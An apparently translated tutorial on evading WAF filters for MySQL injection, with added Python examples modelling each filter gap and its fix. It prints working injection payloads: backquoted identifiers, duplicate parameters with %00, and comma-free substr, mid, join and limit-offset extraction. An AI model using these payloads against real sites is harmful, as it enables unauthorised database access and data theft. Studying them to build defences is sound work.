SQL injection bypass (2)
2022-06-28 02:21:00 【A τθ】
1. Backquote bypass
In MySQL you can put backquotes (`) around identifiers to bypass some WAF interception. A field name written with or without backquotes means exactly the same thing:
insert into users(username,password,email)values('test','123456','[email protected]');
insert into users(`username`,`password`,`email`)values('test','123456','[email protected]');
The same idea in an injection payload, with the table name backquoted:
\N'union distinct select 1,(select version() from `users` limit 1)--+&submit=1
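Why the backquoted spelling slips past a text-matching rule, and the canonicalisation step that closes the gap, as an added example (this is not code from the original post; the signature, the two sample statements and the helper names are constructed for this illustration):

```python
import re

# Constructed sample statements: the one from this section, with and without backticks.
PLAIN = "select 1,(select version() from users limit 1)"
BACKTICKED = "select 1,(select version() from `users` limit 1)"

# A naive WAF signature: the table name spelled out directly after FROM.
# Hypothetical rule written for this example, not any product's real ruleset.
SIGNATURE = re.compile(r"\bfrom\s+users\b", re.IGNORECASE)

def naive_match(sql: str) -> bool:
    """Match the signature against the raw text. The backticked spelling does not
    contain the substring 'from users', so the rule is silently missed."""
    return bool(SIGNATURE.search(sql))

# A backtick-quoted identifier; a doubled backtick inside it is a literal backtick.
_QUOTED_IDENT = re.compile(r"`((?:[^`]|``)*)`")

def normalize_identifiers(sql: str) -> str:
    """Rewrite `name` as name so quoted and unquoted spellings compare equal.
    This is the canonicalisation a signature engine must run before matching;
    it does not tokenise string literals, which a production engine would."""
    return _QUOTED_IDENT.sub(lambda m: m.group(1).replace("``", "`"), sql)

def normalized_match(sql: str) -> bool:
    """Match after canonicalisation: both spellings now trigger the same rule."""
    return bool(SIGNATURE.search(normalize_identifiers(sql)))

if __name__ == "__main__":
    for sample in (PLAIN, BACKTICKED):
        print(f"{sample!r}: raw={naive_match(sample)} normalized={normalized_match(sample)}")
```

The point for a defender is that a rule written against raw request text is only as good as the canonical form it matches on; normalising identifier quoting (and, in the same pass, case, whitespace and comments) is what makes the two spellings indistinguishable to the rule.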

2. Scripting language features bypass
2.1 Introduction
In PHP, for id=1&id=2 the later value automatically overwrites the earlier one; other languages handle repeated parameters differently. This can be used to bypass some WAF interception:
id=1%00&id=2 union select 1,2,3
Some WAFs match only the first id parameter, 1%00. Because %00 is a truncation character, the WAF stops reading there and the content that follows is never inspected. By the time the value reaches the application, id equals 2 union select 1,2,3, so the injection passes the interception.
Other language features

2.2 Practice 1


2.3 Practice 2
?name=vince%00&name=' union select 1,database()--+&submit=1
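The mismatch described in this section, modelled in a few lines: a WAF that keeps only the first occurrence of a key and stops at a NUL byte, a PHP-style backend where the last value wins, and the hardened inspection that looks at every occurrence. This is an added example, not code from the original post; the query string and the UNION marker rule are constructed for the illustration.

```python
import re
from urllib.parse import parse_qs, unquote_to_bytes

# Constructed query string for the technique above: the first id ends in a NUL
# byte, the second carries the payload.
QUERY = "id=1%00&id=2 union select 1,2,3"

# Minimal marker for a UNION-based payload; hypothetical rule for this example.
UNION_MARKER = re.compile(r"\bunion\b\s+(?:all\s+|distinct\s+)?select\b", re.IGNORECASE)

def waf_sees(query: str) -> dict:
    """Model of the WAF the text describes: keeps only the FIRST occurrence of a
    key and, C-string minded, stops reading a value at the first NUL byte."""
    seen = {}
    for pair in query.split("&"):
        key, _, raw = pair.partition("=")
        if key in seen:
            continue
        value = unquote_to_bytes(raw).split(b"\x00", 1)[0]
        seen[key] = value.decode("latin-1")
    return seen

def application_sees(query: str) -> dict:
    """Model of PHP's $_GET: a repeated key is overwritten, so the LAST value wins."""
    result = {}
    for pair in query.split("&"):
        key, _, raw = pair.partition("=")
        result[key] = unquote_to_bytes(raw).decode("latin-1")
    return result

def detect_first_only(query: str) -> bool:
    """Inspection limited to what waf_sees() returns: the payload is never examined."""
    return any(UNION_MARKER.search(v) for v in waf_sees(query).values())

def detect_all_occurrences(query: str) -> bool:
    """Hardened inspection: every occurrence of every key, NUL bytes kept, so the
    WAF's view of the request covers whatever any backend language will see."""
    params = parse_qs(query, keep_blank_values=True)
    return any(UNION_MARKER.search(v) for values in params.values() for v in values)

if __name__ == "__main__":
    print("WAF sees:        ", waf_sees(QUERY))
    print("application sees:", application_sees(QUERY))
    print("first-only detect:", detect_first_only(QUERY))
    print("all-values detect:", detect_all_occurrences(QUERY))
```

The rule that falls out of this is that an inspection layer must never pick one occurrence of a parameter and must never truncate on bytes the backend does not truncate on; inspecting every value of every key, as detect_all_occurrences does, makes the parameter-overwrite behaviour of any particular language irrelevant.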

3. Comma bypass
Some anti-injection scripts intercept commas, because a regular injection has to contain one, for example:
select * from users where id=1 union select 1,2,3,4;
Generally the commas are filtered to nothing, so the statement becomes select * from users where id=1 union select 1 2 3 4; and the SQL is a syntax error. The injection can therefore be done without commas.
The bypass methods are as follows:
3.1 Method 1: substr string extraction
Query the first character of the current database name:
select(substr(database() from 1 for 1));
If comparing against 'p' is true, the page returns normally, so the first character is p:
select * from users where id=1 and 'p'=(select(substr(database() from 1 for 1)));
This can be optimised further by writing the character in hex (m is 0x6D, p is 0x70), which avoids the single quotes:
select * from users where id=1 and 0x70=(select(substr(database() from 1 for 1)));

?name=vince' and (select(substr(database() from 1 for 1)))='p'--+&submit=1
?name=vince' and (select(substr(database() from 1 for 1)))='x'--+&submit=1


3.2 Method 2: mid string extraction
The mid function does the same as substr; if substr is intercepted or filtered, mid can be used instead.
select (mid(database() from 1 for 1));
select * from users where id=1 and 'p'=(select(mid(database() from 1 for 1)));
select * from users where id=1 and 0x70=(select(mid(database() from 1 for 1)));

3.3 Method 3: join bypass
Use join to join derived tables:
union select 1,2 is equivalent to union select * from (select 1)a join (select 2)b, where a and b are the table aliases.
select * from users where id=-1 union select 1,2,3,4;
select * from users where id=-1 union select * from (select 1)a join (select 2)b
join(select 3)c join(select 4)d;
select * from users where id=-1 union select * from (select 1)a join (select 2)b
join(select user())c join(select 4)d;
There is no comma anywhere in this statement, which bypasses the WAF's interception of commas.

3.4 Method 4: like bypass
Use a like fuzzy query: select user() like '%r%'; returns 1 when the pattern matches, otherwise 0.
After the first character is found, continue matching the next one until the whole string has been recovered. The final injection statement contains no comma and bypasses the WAF interception.

3.5 Method 5: limit offset bypass
When injecting, if you need to restrict the number of returned rows you can use limit 0,1, which returns one record. If commas are intercepted, limit 1 returns the first row by default, and limit 1 offset 0 returns the first record starting from offset zero; either form bypasses the WAF interception.
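Every method in this section works because a comma filter operates on the input text while the injection operates on the statement. The example below is added here, not code from the original post: it runs the page's union payload and the comma-free join variant from method 3 against a constructed in-memory SQLite table, first through string concatenation (with and without the comma filter), then through a parameterised query. MySQL's database() is replaced by SQLite's sqlite_version() so the statements execute offline; the four-column users table and the helper names are assumptions.

```python
import sqlite3

# Constructed in-memory stand-in for the users(username,password,email) table on
# this page; SQLite is used so the example runs offline.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users(id integer, username text, password text, email text)")
    conn.execute("insert into users values (1, 'test', '123456', 'test@example.com')")
    return conn

# The page's union payload, with MySQL's database() replaced by SQLite's
# sqlite_version() so it executes here (assumption: four-column users table).
PAYLOAD_WITH_COMMAS = "vince' union select 1,sqlite_version(),3,4--"

# The same data pulled with the join trick from method 3: no comma anywhere.
PAYLOAD_NO_COMMA = ("vince' union select * from (select 1)a join (select sqlite_version())b "
                    "join (select 3)c join (select 4)d--")

def comma_filter(value: str) -> str:
    """The brittle defence described above: delete every comma from the input."""
    return value.replace(",", "")

def lookup_concatenated(conn: sqlite3.Connection, name: str) -> list:
    """Vulnerable: the value is spliced into the statement text, so the quote,
    UNION and comment inside the value become part of the query."""
    sql = "select * from users where username='%s'" % name
    return conn.execute(sql).fetchall()

def lookup_parameterized(conn: sqlite3.Connection, name: str) -> list:
    """Hardened: the value is bound as data and cannot change the statement,
    whatever characters it contains."""
    return conn.execute("select * from users where username=?", (name,)).fetchall()

def run_demo() -> dict:
    """Compare the approaches; a row (1, <version>, 3, 4) in a result means the
    injected SELECT executed, an empty list means the value was treated as data."""
    conn = make_db()
    return {
        "concat_union": lookup_concatenated(conn, PAYLOAD_WITH_COMMAS),
        "concat_after_comma_filter": lookup_concatenated(conn, comma_filter(PAYLOAD_NO_COMMA)),
        "param_union": lookup_parameterized(conn, PAYLOAD_WITH_COMMAS),
        "param_no_comma": lookup_parameterized(conn, PAYLOAD_NO_COMMA),
        "param_legit": lookup_parameterized(conn, "test"),
    }

if __name__ == "__main__":
    for label, rows in run_demo().items():
        print(f"{label:26s} -> {rows}")
```

The comma filter does stop PAYLOAD_WITH_COMMAS (the filtered text is no longer valid SQL), but it leaves PAYLOAD_NO_COMMA untouched and the union row still comes back, which is exactly the gap this section describes. The parameterised lookup returns nothing for either payload and the correct row for a legitimate name, because the bound value never reaches the SQL parser as statement text; that, rather than any character blocklist, is the fix a WAF rule can only approximate.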
